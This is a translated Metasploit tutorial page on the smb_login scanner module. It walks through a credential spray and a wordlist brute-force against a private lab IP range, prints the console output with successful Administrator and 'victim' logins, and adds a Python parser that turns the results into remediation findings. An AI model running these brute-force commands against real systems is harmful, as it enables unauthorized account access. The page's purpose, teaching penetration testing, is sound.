Smb/smb login

From www.metasploit-es.com.ar

The Metasploit "smb_login" module attempts to log in via SMB across a given range of IP addresses. If you have a database plugin loaded, successful logins are stored in it for future reference and use.

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

You can clearly see that this module has many more options than other auxiliary modules and is quite versatile. First we will run a scan using the Administrator credentials we have 'found'.

msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-165
RHOSTS => 192.168.1.150-165
msf auxiliary(smb_login) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(smb_login) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(smb_login) > set THREADS 16
THREADS => 16
msf auxiliary(smb_login) > run

[*] Starting SMB login attempt on 192.168.1.165
[*] Starting SMB login attempt on 192.168.1.153
...snip...
[*] Starting SMB login attempt on 192.168.1.156
[*] 192.168.1.154 - FAILED LOGIN () Administrator :  (STATUS_LOGON_FAILURE)
[*] 192.168.1.150 - FAILED LOGIN (Windows 5.1) Administrator :  (STATUS_LOGON_FAILURE)
[*] 192.168.1.160 - FAILED LOGIN (Windows 5.1) Administrator :  (STATUS_LOGON_FAILURE)
[*] 192.168.1.154 - FAILED LOGIN () Administrator : s3cr3t (STATUS_LOGON_FAILURE)
[-] 192.168.1.162 - FAILED LOGIN (Windows 7 Enterprise 7600) Administrator :  (STATUS_ACCOUNT_DISABLED)
[*] 192.168.1.161 - FAILED LOGIN (Windows 5.1) Administrator :  (STATUS_LOGON_FAILURE)
[+] 192.168.1.150 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[*] Scanned 04 of 16 hosts (025% complete)
[+] 192.168.1.160 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[*] Scanned 13 of 16 hosts (081% complete)
[*] Scanned 14 of 16 hosts (087% complete)
[*] Scanned 15 of 16 hosts (093% complete)
[*] Scanned 16 of 16 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >

The "smb_login" module can also be given a list of usernames and passwords to attempt a brute-force login across a range of machines.

root@bt:~# cat users.txt
Administrator
dale
chip
dookie
victim
jimmie

root@bt:~# cat passwords.txt
password
god
password123
s00pers3kr1t
s3cr3t

We will use this limited set of usernames and passwords and run the scanner again.

msf auxiliary(smb_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) > set PASS_FILE /root/passwords.txt
PASS_FILE => /root/passwords.txt
msf auxiliary(smb_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-165
RHOSTS => 192.168.1.150-165
msf auxiliary(smb_login) > set THREADS 16
THREADS => 16
msf auxiliary(smb_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(smb_login) > run

[-] 192.168.1.162 - FAILED LOGIN (Windows 7 Enterprise 7600) Administrator :  (STATUS_ACCOUNT_DISABLED)
[*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) dale :
[*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) chip :
[*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) dookie :
[*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) jimmie :
[+] 192.168.1.150 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[+] 192.168.1.160 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'victim' : 's3cr3t'
[+] 192.168.1.162 - SUCCESSFUL LOGIN (Windows 7 Enterprise 7600) 'victim' : 's3cr3t'
[*] Scanned 15 of 16 hosts (093% complete)
[*] Scanned 16 of 16 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >
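
As an added example (not part of the original page or of Metasploit), the following Python code parses result lines in the format shown above and groups them into findings to remediate: the same credential accepted on several hosts, hosts that answered with GUEST LOGIN, and disabled accounts. The names parse and summarize are hypothetical, and SAMPLE is a trimmed copy of the lab output above.

```python
import re
from collections import defaultdict

# Trimmed copy of the second run shown on this page (lab output).
SAMPLE = """\
[-] 192.168.1.162 - FAILED LOGIN (Windows 7 Enterprise 7600) Administrator :  (STATUS_ACCOUNT_DISABLED)
[*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) dale :
[+] 192.168.1.150 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[+] 192.168.1.160 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'victim' : 's3cr3t'
[+] 192.168.1.162 - SUCCESSFUL LOGIN (Windows 7 Enterprise 7600) 'victim' : 's3cr3t'
[*] Scanned 16 of 16 hosts (100% complete)
"""

LINE = re.compile(r"^\[[*+-]\] (?P<host>[\d.]+) - (?P<kind>SUCCESSFUL|FAILED|GUEST) LOGIN "
                  r"\((?P<os>[^)]*)\) (?P<rest>.*)$")
STATUS = re.compile(r"\((STATUS_\w+)\)\s*$")

def parse(text):
    """Yield one dict per login result line; progress lines are skipped."""
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        rest, st = m["rest"], STATUS.search(m["rest"])
        if st:
            rest = rest[:st.start()]          # drop the trailing (STATUS_...) code
        user, _, pw = rest.partition(" :")    # passwords may be quoted or bare
        yield {"host": m["host"], "kind": m["kind"], "os": m["os"],
               "user": user.strip(" '"), "password": pw.strip(" '"),
               "status": st.group(1) if st else None}

def summarize(text):
    """Group results into findings for the remediation section of a report."""
    by_cred, guest, disabled = defaultdict(set), set(), set()
    for r in parse(text):
        if r["kind"] == "SUCCESSFUL":
            by_cred[(r["user"], r["password"])].add(r["host"])
        elif r["kind"] == "GUEST":
            guest.add(r["host"])
        elif r["status"] == "STATUS_ACCOUNT_DISABLED":
            disabled.add((r["host"], r["user"]))
    # Passwords are left out of the summary; only the reuse pattern is reported.
    reused = {u: sorted(h) for (u, _), h in by_cred.items() if len(h) > 1}
    return {"reused": reused, "guest_hosts": sorted(guest), "disabled": sorted(disabled)}

if __name__ == "__main__":
    print(summarize(SAMPLE))
```
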

There are many more options available that you should experiment with to become fully familiar with this extremely valuable module.



© Offensive Security 2009

Original from www.offensive-security.com
Translated by cbk999